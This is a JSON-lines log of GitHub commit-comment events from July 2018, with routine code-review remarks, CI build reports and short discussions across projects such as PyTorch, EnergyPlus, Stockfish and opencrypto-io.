{"id":"8040236270","type":"CommitCommentEvent","actor":{"login":"zdevito"},"repo":{"name":"resistor/pytorch"},"payload":{"comment":{"id":29893764,"position":30,"line":147,"path":"torch/csrc/jit/passes/common_subexpression_elimination.cpp","commit_id":"0d72547f46f573f6342a5f8cc24c82d0428ffe86","created_at":"2018-07-30T20:55:32Z","updated_at":"2018-07-30T20:55:32Z","author_association":"NONE","body":"Because this is a second pass through the nodes, I think there is a topological ordering problem here. Not all the things in the `subexpr` map will be in scope at the point the subblock requires them."}},"created_at":"2018-07-30T20:55:32Z"}
{"id":"8040236888","type":"CommitCommentEvent","actor":{"login":"WaxCylinderRevival"},"repo":{"name":"HistoryAtState/frus"},"payload":{"comment":{"id":29893765,"position":null,"line":null,"path":null,"commit_id":"2e0bcd35cd93660a78a821d32bc82428e8208db4","created_at":"2018-07-30T20:55:39Z","updated_at":"2018-07-30T20:55:39Z","author_association":"MEMBER","body":"@vak2ve, for obviously dated material, I've converted or added the datelines but I haven't explored all the attachments in this stage.  I much prefer the way such attachments were encoded in frus1871, but I decided not to change too much in the frus1868s or elsewhere.  Examples:\r\n\r\n```xml\r\n<frus:attachment>\r\n   <opener><dateline rendition=\"#center\">[From the <placeName>Hong-Kong</placeName>\r\n                                Press.—Supplement of Wednesday, <date when=\"1871-04-05\"\r\n                                    calendar=\"gregorian\">April 5, 1871</date>.]</dateline></opener>\r\n                        <head>Rendition of Chinese.</head>\r\n   ...\r\n</frus:attachment>\r\n```\r\n\r\n```xml\r\n <frus:attachment>\r\n  <opener><dateline rendition=\"#center\">[From the Official Journal, <date\r\n      when=\"1870-12-08\" calendar=\"gregorian\">December 8,\r\n      1870</date>.]</dateline></opener>\r\n            <head>[Untitled]</head>\r\n   ...\r\n</frus:attachment>\r\n```\r\n\r\n\r\n\r\n[I'm noticing now that the @ana should be #date_undated-inferred-from-document-head.  I'll update in the next commit.]"}},"created_at":"2018-07-30T20:55:39Z"}
{"id":"8040237890","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29893766,"position":null,"line":null,"path":null,"commit_id":"98e879f9967598d7a26576f0f45438584eea5206","created_at":"2018-07-30T20:55:51Z","updated_at":"2018-07-30T20:55:51Z","author_association":"NONE","body":"expanded-runperiod (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2955 of 2957 tests passed, 3 test warnings)\n\nMessages:\n\n * 1 test had: EIO diffs.\n * 1 test had: ESO small diffs.\n * 2 tests had: Table small diffs.\n * 1 test had: AUD diffs.\n\nFailures:\n\n\nInputProcessorFixture Test Summary\n * Passed: 51\n * Failed: 1\n\nintegration Test Summary\n * Passed: 625\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-98e879f9967598d7a26576f0f45438584eea5206-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-98e879f9967598d7a26576f0f45438584eea5206-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.93%25-yellow.png)</a> \n"}},"created_at":"2018-07-30T20:55:51Z"}
{"id":"8040240117","type":"CommitCommentEvent","actor":{"login":"glaschenko"},"repo":{"name":"Glasch/Personal"},"payload":{"comment":{"id":29893770,"position":17,"line":17,"path":"src/Worker.java","commit_id":"f4f68d389a3b18af2ef4559f57552be4f4053a14","created_at":"2018-07-30T20:56:18Z","updated_at":"2018-07-30T20:56:18Z","author_association":"COLLABORATOR","body":"где getters? почему не private?"}},"created_at":"2018-07-30T20:56:18Z"}
{"id":"8040242703","type":"CommitCommentEvent","actor":{"login":"artpol84"},"repo":{"name":"openucx/ucx"},"payload":{"comment":{"id":29893777,"position":14,"line":139,"path":"src/ucp/core/ucp_context.c","commit_id":"7e1bb5f822e2e99a0103172fb417c327b464ff51","created_at":"2018-07-30T20:56:48Z","updated_at":"2018-07-30T20:56:48Z","author_association":"CONTRIBUTOR","body":"@yosefe @brminich \r\nShould be \"interNal\""}},"created_at":"2018-07-30T20:56:48Z"}
{"id":"8040244276","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29893780,"position":null,"line":null,"path":null,"commit_id":"f218d067a6492685c5533c6044109fef5950f6b1","created_at":"2018-07-30T20:57:09Z","updated_at":"2018-07-30T20:57:09Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-102](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-102).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-102-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-30T20:57:09Z"}
{"id":"8040245302","type":"CommitCommentEvent","actor":{"login":"jctosta"},"repo":{"name":"jctosta/modelCanvas"},"payload":{"comment":{"id":29893787,"position":null,"line":null,"path":null,"commit_id":"73a7146b728f5b6682f90bbd49cc10ca0ae696e4","created_at":"2018-07-30T20:57:21Z","updated_at":"2018-07-30T20:57:21Z","author_association":"OWNER","body":"Close issues #2, #3, #4 and #5."}},"created_at":"2018-07-30T20:57:21Z"}
{"id":"8040245894","type":"CommitCommentEvent","actor":{"login":"RedAlex"},"repo":{"name":"ESX-PUBLIC/esx_joblogs"},"payload":{"comment":{"id":29893788,"position":null,"line":null,"path":null,"commit_id":"9a632ab0e43ea7968dae2a3dfac0240e7e35b4b2","created_at":"2018-07-30T20:57:29Z","updated_at":"2018-07-30T20:57:29Z","author_association":"COLLABORATOR","body":"Bad title of the commit... \r\nUpdate Locales ready for esx_mecanojob"}},"created_at":"2018-07-30T20:57:29Z"}
{"id":"8040248854","type":"CommitCommentEvent","actor":{"login":"chenryhen"},"repo":{"name":"apartmenttherapy/oxygen-lib-ui"},"payload":{"comment":{"id":29893797,"position":null,"line":null,"path":null,"commit_id":"3d7cd7974384bf40ab6e31876a4e895bad34bd04","created_at":"2018-07-30T20:58:05Z","updated_at":"2018-07-30T20:58:05Z","author_association":"MEMBER","body":"Accidentally committed this straight to master. This is in preparation of \r\nhttps://app.asana.com/0/0/758911553336698/f"}},"created_at":"2018-07-30T20:58:05Z"}
{"id":"8040250346","type":"CommitCommentEvent","actor":{"login":"nathanhaigh"},"repo":{"name":"GMOD/jbrowse"},"payload":{"comment":{"id":29893799,"position":null,"line":null,"path":null,"commit_id":"475f1f55ed6f477ec2ce40d63807e23c02d72445","created_at":"2018-07-30T20:58:22Z","updated_at":"2018-07-30T20:58:22Z","author_association":"CONTRIBUTOR","body":"@cmdcolin Is this to make sure the json file doesn't contain quotes around the numerical values? If so, don't the other hash values also need to be cast into numbers using `+0`?"}},"created_at":"2018-07-30T20:58:22Z"}
{"id":"8040254737","type":"CommitCommentEvent","actor":{"login":"ferrouswheel"},"repo":{"name":"AmeBel/atomspace"},"payload":{"comment":{"id":29893815,"position":null,"line":null,"path":null,"commit_id":"36ba5d43fe8ea2eff31a650f9066aafffb2a9895","created_at":"2018-07-30T20:59:15Z","updated_at":"2018-07-30T20:59:15Z","author_association":"NONE","body":"I feel like if the unit test framework spawns the `gearmand` process, it should be killed afterwards as well."}},"created_at":"2018-07-30T20:59:15Z"}
{"id":"8040256323","type":"CommitCommentEvent","actor":{"login":"NGUYENTUANANH1983"},"repo":{"name":"commaai/android_packages_apps_Settings"},"payload":{"comment":{"id":29893819,"position":4,"line":2515,"path":"res/values-af/strings.xml","commit_id":"d8c29b8f2327a2df83e606e286d053cfce28ba16","created_at":"2018-07-30T20:59:34Z","updated_at":"2018-07-30T20:59:34Z","author_association":"NONE","body":"2515"}},"created_at":"2018-07-30T20:59:34Z"}
{"id":"8040256370","type":"CommitCommentEvent","actor":{"login":"robertpeteuil"},"repo":{"name":"mkaz/termgraph"},"payload":{"comment":{"id":29893820,"position":null,"line":null,"path":null,"commit_id":"16bf23a2a4cf3b55244f023504c1d59847970781","created_at":"2018-07-30T20:59:35Z","updated_at":"2018-07-30T20:59:35Z","author_association":"CONTRIBUTOR","body":"don't forget to close the issue.  That way nosy people dont see it, or mistake an open issue as lack of maintaining your repo :-)"}},"created_at":"2018-07-30T20:59:35Z"}
{"id":"8040258394","type":"CommitCommentEvent","actor":{"login":"dougshell"},"repo":{"name":"dougshell/Simply-Love-SM5"},"payload":{"comment":{"id":29893824,"position":null,"line":null,"path":null,"commit_id":"a6c494a9a2b2c63803e443ad43ab39f5e42467d6","created_at":"2018-07-30T21:00:00Z","updated_at":"2018-07-30T21:00:00Z","author_association":"OWNER","body":"Dan, truth be told, I didnt realize I was in my fork. It has been a long day :(\r\n\r\nIt is possible that I misunderstood the initial description text. I took it to mean that using EFCA mode set a default value of 0 when it should have been .0015. However, based on what you have said here, EFCA mode cares not how Simply Love is configured and will set the proper timing window accordingly.\r\n\r\nIs it safe to assume that playing with an up to date Simply Love, enabling EFCA mode will properly add .0015 timing and that no other steps are required?"}},"created_at":"2018-07-30T21:00:00Z"}
{"id":"8040268614","type":"CommitCommentEvent","actor":{"login":"dguzek"},"repo":{"name":"dougshell/Simply-Love-SM5"},"payload":{"comment":{"id":29893861,"position":null,"line":null,"path":null,"commit_id":"a6c494a9a2b2c63803e443ad43ab39f5e42467d6","created_at":"2018-07-30T21:01:55Z","updated_at":"2018-07-30T21:01:55Z","author_association":"NONE","body":"> I took it to mean that using EFCA mode set a default value of 0 when it should have been .0015\r\n\r\nThat is correct.\r\n\r\n> EFCA mode cares not how Simply Love is configured and will set the proper timing window accordingly.\r\n\r\nThat is also correct.\r\n\r\n> Is it safe to assume that playing with an up to date Simply Love, enabling EFCA mode will properly add .0015 timing and that no other steps are required?\r\n\r\nYes, that's the idea. 🙂"}},"created_at":"2018-07-30T21:01:55Z"}
{"id":"8040274840","type":"CommitCommentEvent","actor":{"login":"caugner"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29893875,"position":5,"line":3793,"path":"config/locales/server.en.yml","commit_id":"159266ae6678c979c460019277782218dda3ea7d","created_at":"2018-07-30T21:03:11Z","updated_at":"2018-07-30T21:03:11Z","author_association":"CONTRIBUTOR","body":"I understand, and yet it would be clearer to explicitly ask to fill the `DEVELOPER_EMAIL` setting with the *administrator email address* in the `app.yml` file.\r\n\r\nPS: I came across this during translation to German, and I guess some translators will – unknowingly – translate the word *developer*, which won't make sense to the user."}},"created_at":"2018-07-30T21:03:11Z"}
{"id":"8040276513","type":"CommitCommentEvent","actor":{"login":"tas50"},"repo":{"name":"sous-chefs/apache2"},"payload":{"comment":{"id":29893880,"position":null,"line":null,"path":null,"commit_id":"806e4511e66b720797bc6b3c14235f07de6026c4","created_at":"2018-07-30T21:03:32Z","updated_at":"2018-07-30T21:03:32Z","author_association":"CONTRIBUTOR","body":"Beautiful "}},"created_at":"2018-07-30T21:03:32Z"}
{"id":"8040277807","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29893882,"position":null,"line":null,"path":null,"commit_id":"5aa1d89e1a211c870c80943fc3c838b86b22475d","created_at":"2018-07-30T21:03:46Z","updated_at":"2018-07-30T21:03:46Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-301](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-301).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-301-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-30T21:03:46Z"}
{"id":"8040286120","type":"CommitCommentEvent","actor":{"login":"cryptomari0"},"repo":{"name":"opencrypto-io/data"},"payload":{"comment":{"id":29893901,"position":4,"line":84,"path":"db/projects/monero/project.yaml","commit_id":"b702e41d753b0df2c569f4878ffb5486d9322410","created_at":"2018-07-30T21:05:28Z","updated_at":"2018-07-30T21:05:28Z","author_association":"MEMBER","body":"Ty sis opravil svoji vlastni chybu a tady k tomu kazdy muze napsat komentar, je to tak?"}},"created_at":"2018-07-30T21:05:28Z"}
{"id":"8040286503","type":"CommitCommentEvent","actor":{"login":"dougshell"},"repo":{"name":"dougshell/Simply-Love-SM5"},"payload":{"comment":{"id":29893903,"position":null,"line":null,"path":null,"commit_id":"a6c494a9a2b2c63803e443ad43ab39f5e42467d6","created_at":"2018-07-30T21:05:33Z","updated_at":"2018-07-30T21:05:33Z","author_association":"OWNER","body":"I see now. \r\nSimply Love Pref allowed the user to enable or disable the setting. EFCA mode hard codes a value, but unfortunately, that value was incorrect in the hard coded preference. \r\n\r\nDue to this, all players who were enabling EFCA mode actually had incorrect windows for their gameplay. Your commit, which for some reason I commented on within my own fork, corrects this and establishes the correct default value of .0015 for EFCA.  \r\n\r\nSleep, the breakfast of champions.\r\nThank you as always for the explanation."}},"created_at":"2018-07-30T21:05:33Z"}
{"id":"8040287270","type":"CommitCommentEvent","actor":{"login":"aliu-vmware"},"repo":{"name":"wavefrontHQ/wavefront-lambda-nodejs"},"payload":{"comment":{"id":29893905,"position":null,"line":null,"path":null,"commit_id":"068f087b4c3dca23e4006c25768237a9969b6849","created_at":"2018-07-30T21:05:42Z","updated_at":"2018-07-30T21:05:42Z","author_association":"NONE","body":"LGTM"}},"created_at":"2018-07-30T21:05:42Z"}
{"id":"8040288548","type":"CommitCommentEvent","actor":{"login":"DanielKatsuren"},"repo":{"name":"DanielKatsuren/neora-test"},"payload":{"comment":{"id":29893907,"position":null,"line":null,"path":null,"commit_id":"2287cd00332eb5bab60cb55dcb6e8a49b06daf9a","created_at":"2018-07-30T21:05:58Z","updated_at":"2018-07-30T21:05:58Z","author_association":"OWNER","body":"Commit inicial"}},"created_at":"2018-07-30T21:05:58Z"}
{"id":"8040290630","type":"CommitCommentEvent","actor":{"login":"getdls"},"repo":{"name":"slashiee/cemu_graphic_packs"},"payload":{"comment":{"id":29893912,"position":null,"line":null,"path":null,"commit_id":"6b6ab31bba0bc5c3bbf9288085bade35b8a2f78d","created_at":"2018-07-30T21:06:24Z","updated_at":"2018-07-30T21:06:24Z","author_association":"COLLABORATOR","body":"<img width=\"644\" alt=\"css\" src=\"https://user-images.githubusercontent.com/25286924/43423598-22389e72-944d-11e8-84eb-326d17c4d0b8.png\">\r\n"}},"created_at":"2018-07-30T21:06:24Z"}
{"id":"8040293163","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29893917,"position":null,"line":null,"path":null,"commit_id":"0c4ba9385ead955a7015649e25af0de84ba97553","created_at":"2018-07-30T21:06:55Z","updated_at":"2018-07-30T21:06:55Z","author_association":"NONE","body":"Ok so far the results:\r\nSTC 4 threads => passed in 9K with 6.11 Elo\r\nLTC 4 threads => failed in 30K with 0.48 Elo\r\nLTC 8 threads => passed in 45 K with 1.92 Elo\r\n\r\nSo it seeems scaling with TC is very bad but scaling with threads seems at least ok.\r\n"}},"created_at":"2018-07-30T21:06:55Z"}
{"id":"8040298006","type":"CommitCommentEvent","actor":{"login":"amanbop"},"repo":{"name":"ca-cwds/intake"},"payload":{"comment":{"id":29893929,"position":5,"line":13,"path":"app/javascript/sagas/fetchRelationshipsSaga.js","commit_id":"649806db0591e021070defd5f90df28d8dc08013","created_at":"2018-07-30T21:07:53Z","updated_at":"2018-07-30T21:07:53Z","author_association":"CONTRIBUTOR","body":"Here we don't need to join for screeningId as it is only going to be one value"}},"created_at":"2018-07-30T21:07:53Z"}
{"id":"8040300198","type":"CommitCommentEvent","actor":{"login":"WaxCylinderRevival"},"repo":{"name":"HistoryAtState/frus"},"payload":{"comment":{"id":29893933,"position":null,"line":null,"path":null,"commit_id":"2e0bcd35cd93660a78a821d32bc82428e8208db4","created_at":"2018-07-30T21:08:20Z","updated_at":"2018-07-30T21:08:20Z","author_association":"MEMBER","body":"@vak2ve, for your guidelines, resolving the schema errors, etc. would be the goal and document dates are definitely the priority.  For attachments, we can consider work like dating attachments that don't appear as errors as enhancement work.  \r\n\r\nThe \"[From... {publication title}, {date}]\" statements are low hanging fruit so I used the XPath Builder to see how many were in q3 and to work on them:\r\n\r\n- //(div|*:attachment)[not(descendant::dateline)]/opener[contains(., '[From ')]\r\n- //(div|*:attachment)[not(descendant::dateline)]/head[contains(., '[From ')]"}},"created_at":"2018-07-30T21:08:20Z"}
{"id":"8040302772","type":"CommitCommentEvent","actor":{"login":"resistor"},"repo":{"name":"resistor/pytorch"},"payload":{"comment":{"id":29893937,"position":30,"line":147,"path":"torch/csrc/jit/passes/common_subexpression_elimination.cpp","commit_id":"0d72547f46f573f6342a5f8cc24c82d0428ffe86","created_at":"2018-07-30T21:08:51Z","updated_at":"2018-07-30T21:08:51Z","author_association":"OWNER","body":"There's two options: reorder the parent block to make the values available, or skip the CSE opportunity.  It seems like the former is a better option?"}},"created_at":"2018-07-30T21:08:51Z"}
{"id":"8040305269","type":"CommitCommentEvent","actor":{"login":"p-mongo"},"repo":{"name":"mongodb/mongoid"},"payload":{"comment":{"id":29893942,"position":null,"line":null,"path":null,"commit_id":"5827264f674a2de0cc9a9f66da95458ab4dd8b78","created_at":"2018-07-30T21:09:20Z","updated_at":"2018-07-30T21:09:20Z","author_association":"CONTRIBUTOR","body":"@MMartyn please create an issue if you are experiencing an issue with Mongoid, very few people are notified of comments made on commits in the repo."}},"created_at":"2018-07-30T21:09:20Z"}
{"id":"8040307435","type":"CommitCommentEvent","actor":{"login":"amanbop"},"repo":{"name":"ca-cwds/intake"},"payload":{"comment":{"id":29893944,"position":5,"line":28,"path":"spec/javascripts/sagas/fetchRelationshipsSagaSpec.js","commit_id":"649806db0591e021070defd5f90df28d8dc08013","created_at":"2018-07-30T21:09:43Z","updated_at":"2018-07-30T21:09:43Z","author_association":"CONTRIBUTOR","body":"screeningId will be a single value not an array"}},"created_at":"2018-07-30T21:09:43Z"}
{"id":"8040307470","type":"CommitCommentEvent","actor":{"login":"stasgm"},"repo":{"name":"stasgm/qb-test"},"payload":{"comment":{"id":29893945,"position":4,"line":4,"path":".gitignore","commit_id":"698b47c6028d554f5ed6dbcd88cc3cadfe0cba39","created_at":"2018-07-30T21:09:44Z","updated_at":"2018-07-30T21:09:44Z","author_association":"OWNER","body":"Done"}},"created_at":"2018-07-30T21:09:44Z"}
{"id":"8040308301","type":"CommitCommentEvent","actor":{"login":"Vizvezdenec"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29893949,"position":null,"line":null,"path":null,"commit_id":"0c4ba9385ead955a7015649e25af0de84ba97553","created_at":"2018-07-30T21:09:53Z","updated_at":"2018-07-30T21:09:53Z","author_association":"NONE","body":"Also first test with 4 threads can be a lucky run and most probably is one.\r\nCurrent SF SMP scaling to 4 threads is really really good and it's really hard to improve it by signifficant margin. If we count in diminishing returns with longer TC it's really hard to pass 5+0.05 and 20+0.2 on 4 threads - there is basically no elo to gain there (imho).\r\nPassing 8 threads test on the other hand is a pretty good indication that this idea has some gas into it, imho."}},"created_at":"2018-07-30T21:09:53Z"}
{"id":"8040308593","type":"CommitCommentEvent","actor":{"login":"amanbop"},"repo":{"name":"ca-cwds/intake"},"payload":{"comment":{"id":29893950,"position":14,"line":40,"path":"spec/javascripts/sagas/fetchRelationshipsSagaSpec.js","commit_id":"649806db0591e021070defd5f90df28d8dc08013","created_at":"2018-07-30T21:09:57Z","updated_at":"2018-07-30T21:09:57Z","author_association":"CONTRIBUTOR","body":"same as above"}},"created_at":"2018-07-30T21:09:57Z"}
{"id":"8040309152","type":"CommitCommentEvent","actor":{"login":"burningtree"},"repo":{"name":"opencrypto-io/data"},"payload":{"comment":{"id":29893952,"position":4,"line":84,"path":"db/projects/monero/project.yaml","commit_id":"b702e41d753b0df2c569f4878ffb5486d9322410","created_at":"2018-07-30T21:10:04Z","updated_at":"2018-07-30T21:10:04Z","author_association":"MEMBER","body":"Presne tak"}},"created_at":"2018-07-30T21:10:04Z"}
{"id":"8040309178","type":"CommitCommentEvent","actor":{"login":"WaveHack"},"repo":{"name":"WaveHack/OpenDominion"},"payload":{"comment":{"id":29893953,"position":null,"line":null,"path":null,"commit_id":"dea8e26e099031551aac2931ee0eb5da6cfb39eb","created_at":"2018-07-30T21:10:04Z","updated_at":"2018-07-30T21:10:04Z","author_association":"OWNER","body":"hobbos meaning the Goblin unit: Hobgoblins :^)"}},"created_at":"2018-07-30T21:10:04Z"}
{"id":"8040310432","type":"CommitCommentEvent","actor":{"login":"dguzek"},"repo":{"name":"dougshell/Simply-Love-SM5"},"payload":{"comment":{"id":29893954,"position":null,"line":null,"path":null,"commit_id":"a6c494a9a2b2c63803e443ad43ab39f5e42467d6","created_at":"2018-07-30T21:10:19Z","updated_at":"2018-07-30T21:10:19Z","author_association":"NONE","body":"I'm glad to hear it makes sense, because the code isn't especially self-explanatory and distinctions between the various systems at play (*ThemePrefs* vs *StepMania Preferences*) are subtle.\r\n\r\nDon't worry about misunderstanding at first; breakdowns in communication occur constantly.  Clearly, I was the one who initially misunderstood ECFA's TimingWindows, necessitating this change. 🙂"}},"created_at":"2018-07-30T21:10:19Z"}
{"id":"8040314919","type":"CommitCommentEvent","actor":{"login":"stasgm"},"repo":{"name":"stasgm/qb-test"},"payload":{"comment":{"id":29893965,"position":4,"line":8,"path":"src/App.tsx","commit_id":"3d1c87ef4e6cca2a9a392f028c4ed07f57e01600","created_at":"2018-07-30T21:11:12Z","updated_at":"2018-07-30T21:11:12Z","author_association":"OWNER","body":"И как лучше называть?"}},"created_at":"2018-07-30T21:11:12Z"}
{"id":"8040316593","type":"CommitCommentEvent","actor":{"login":"karthik-sista"},"repo":{"name":"ca-cwds/intake"},"payload":{"comment":{"id":29893967,"position":5,"line":13,"path":"app/javascript/sagas/fetchRelationshipsSaga.js","commit_id":"649806db0591e021070defd5f90df28d8dc08013","created_at":"2018-07-30T21:11:32Z","updated_at":"2018-07-30T21:11:32Z","author_association":"CONTRIBUTOR","body":"👍 will change it."}},"created_at":"2018-07-30T21:11:32Z"}
{"id":"8040318587","type":"CommitCommentEvent","actor":{"login":"karthik-sista"},"repo":{"name":"ca-cwds/intake"},"payload":{"comment":{"id":29893971,"position":5,"line":28,"path":"spec/javascripts/sagas/fetchRelationshipsSagaSpec.js","commit_id":"649806db0591e021070defd5f90df28d8dc08013","created_at":"2018-07-30T21:11:57Z","updated_at":"2018-07-30T21:11:57Z","author_association":"CONTRIBUTOR","body":"👍 will change ."}},"created_at":"2018-07-30T21:11:57Z"}
{"id":"8040319767","type":"CommitCommentEvent","actor":{"login":"karthik-sista"},"repo":{"name":"ca-cwds/intake"},"payload":{"comment":{"id":29893974,"position":14,"line":40,"path":"spec/javascripts/sagas/fetchRelationshipsSagaSpec.js","commit_id":"649806db0591e021070defd5f90df28d8dc08013","created_at":"2018-07-30T21:12:12Z","updated_at":"2018-07-30T21:12:12Z","author_association":"CONTRIBUTOR","body":"will change 👍 "}},"created_at":"2018-07-30T21:12:12Z"}
{"id":"8040324749","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":29893987,"position":null,"line":null,"path":null,"commit_id":"d61cd1a904af9b19e5feaec460a2c9d6327983fd","created_at":"2018-07-30T21:13:17Z","updated_at":"2018-07-30T21:13:17Z","author_association":"NONE","body":"You forgot to call init, which is necessary to copy the Bonus values to the psqt tables\r\n\r\nSo\r\n`TUNE(SetRange(0, 400), Bonus, init);`\r\n\r\nIf it does not compile, try this instead\r\n`TUNE(SetRange(0, 400), Bonus, PSQT::init); `\r\n\r\n\r\n"}},"created_at":"2018-07-30T21:13:17Z"}
{"id":"8040325646","type":"CommitCommentEvent","actor":{"login":"haKingdomsCraft"},"repo":{"name":"RealAstro/MoneyPouch"},"payload":{"comment":{"id":29893990,"position":null,"line":null,"path":null,"commit_id":"e682e5fe1564bed48eba40113b1ca048fb4fed55","created_at":"2018-07-30T21:13:30Z","updated_at":"2018-07-30T21:13:30Z","author_association":"NONE","body":"Hmm u do mistakes"}},"created_at":"2018-07-30T21:13:30Z"}
{"id":"8040325950","type":"CommitCommentEvent","actor":{"login":"nhall"},"repo":{"name":"Fastspot/Boilerplate"},"payload":{"comment":{"id":29893991,"position":null,"line":null,"path":null,"commit_id":"9dbe32d297a58cc3425b94ffb90ea94370bfa7a9","created_at":"2018-07-30T21:13:34Z","updated_at":"2018-07-30T21:13:34Z","author_association":"COLLABORATOR","body":"@mimoduo: What was broken here?"}},"created_at":"2018-07-30T21:13:34Z"}
{"id":"8040333883","type":"CommitCommentEvent","actor":{"login":"jonsterling"},"repo":{"name":"mortberg/cubicaltt"},"payload":{"comment":{"id":29894006,"position":null,"line":null,"path":null,"commit_id":"130165cba5b214b0eda70ce46b131f7ce581df15","created_at":"2018-07-30T21:15:07Z","updated_at":"2018-07-30T21:15:07Z","author_association":"NONE","body":"lmao"}},"created_at":"2018-07-30T21:15:07Z"}
{"id":"8040334866","type":"CommitCommentEvent","actor":{"login":"cmdcolin"},"repo":{"name":"GMOD/jbrowse"},"payload":{"comment":{"id":29894010,"position":null,"line":null,"path":null,"commit_id":"475f1f55ed6f477ec2ce40d63807e23c02d72445","created_at":"2018-07-30T21:15:19Z","updated_at":"2018-07-30T21:15:19Z","author_association":"CONTRIBUTOR","body":"Technically ya I think they are unused though"}},"created_at":"2018-07-30T21:15:19Z"}
{"id":"8040336599","type":"CommitCommentEvent","actor":{"login":"punkusha"},"repo":{"name":"stasgm/qb-test"},"payload":{"comment":{"id":29894012,"position":4,"line":8,"path":"src/App.tsx","commit_id":"3d1c87ef4e6cca2a9a392f028c4ed07f57e01600","created_at":"2018-07-30T21:15:41Z","updated_at":"2018-07-30T21:15:41Z","author_association":"NONE","body":"\"loading\", \"activated\"..."}},"created_at":"2018-07-30T21:15:41Z"}
{"id":"8040337623","type":"CommitCommentEvent","actor":{"login":"shorowit"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29894014,"position":13,"line":56,"path":"doc/input-output-reference/src/overview/group-location-climate-weather-file-access.tex","commit_id":"3640f8e35c1cf35adbe0f135e5f9c14808be368e","created_at":"2018-07-30T21:15:54Z","updated_at":"2018-07-30T21:15:54Z","author_association":"CONTRIBUTOR","body":"@Myoldmopar Typo above \"combind\""}},"created_at":"2018-07-30T21:15:54Z"}
{"id":"8040341806","type":"CommitCommentEvent","actor":{"login":"mclow"},"repo":{"name":"kivadiu/iostreams"},"payload":{"comment":{"id":29894024,"position":null,"line":null,"path":null,"commit_id":"800d0f6e7deef6f4004f00e3307c0adab0c68df3","created_at":"2018-07-30T21:16:43Z","updated_at":"2018-07-30T21:16:43Z","author_association":"NONE","body":"This will work.\r\nNot really sure I'm fond of mixing the of old-style cast `(SIZE_T)` and `static_cast`, though.\r\n"}},"created_at":"2018-07-30T21:16:43Z"}
{"id":"8040343989","type":"CommitCommentEvent","actor":{"login":"gaviles"},"repo":{"name":"QuantConnect/Tutorials"},"payload":{"comment":{"id":29894026,"position":4,"line":241,"path":"04 Strategy Library/00 Strategy Library/01 Strategy Library.php","commit_id":"0911c2317583649020fa1fe219982864998e79a3","created_at":"2018-07-30T21:17:11Z","updated_at":"2018-07-30T21:17:11Z","author_association":"MEMBER","body":"@jaredbroad and @jingwu74 sure that nothing is missing here 😄 "}},"created_at":"2018-07-30T21:17:11Z"}
{"id":"8040345066","type":"CommitCommentEvent","actor":{"login":"burningtree"},"repo":{"name":"opencrypto-io/data"},"payload":{"comment":{"id":29894028,"position":2,"line":2,"path":"db/projects/cardano/project.yaml","commit_id":"ae383cbecc9ca514f0d2c489c3ca0dffc12de52d","created_at":"2018-07-30T21:17:25Z","updated_at":"2018-07-30T21:17:25Z","author_association":"MEMBER","body":"`name` is official name, so it should be `Cardano` (capital first letter)"}},"created_at":"2018-07-30T21:17:25Z"}
{"id":"8040349833","type":"CommitCommentEvent","actor":{"login":"burningtree"},"repo":{"name":"opencrypto-io/data"},"payload":{"comment":{"id":29894037,"position":22,"line":22,"path":"db/projects/cardano/project.yaml","commit_id":"ae383cbecc9ca514f0d2c489c3ca0dffc12de52d","created_at":"2018-07-30T21:18:27Z","updated_at":"2018-07-30T21:18:27Z","author_association":"MEMBER","body":"Satoshi Nakamoto? :-D To asi nebude real, nebo jo?"}},"created_at":"2018-07-30T21:18:27Z"}
{"id":"8040378807","type":"CommitCommentEvent","actor":{"login":"burningtree"},"repo":{"name":"opencrypto-io/data"},"payload":{"comment":{"id":29894137,"position":52,"line":52,"path":"db/projects/cardano/project.yaml","commit_id":"ae383cbecc9ca514f0d2c489c3ca0dffc12de52d","created_at":"2018-07-30T21:24:39Z","updated_at":"2018-07-30T21:24:39Z","author_association":"MEMBER","body":"Tohle asi nema moc spolecnyho s cardanem, ne?"}},"created_at":"2018-07-30T21:24:39Z"}
{"id":"8040382098","type":"CommitCommentEvent","actor":{"login":"burningtree"},"repo":{"name":"opencrypto-io/data"},"payload":{"comment":{"id":29894143,"position":46,"line":46,"path":"db/projects/cardano/project.yaml","commit_id":"ae383cbecc9ca514f0d2c489c3ca0dffc12de52d","created_at":"2018-07-30T21:25:21Z","updated_at":"2018-07-30T21:25:21Z","author_association":"MEMBER","body":"custom adresy musi byt jako\r\n`custom:neco`, tedy v tomhle pripade:\r\n```\r\ncustom:forum: https://forum.cardano.org/\r\n```"}},"created_at":"2018-07-30T21:25:21Z"}
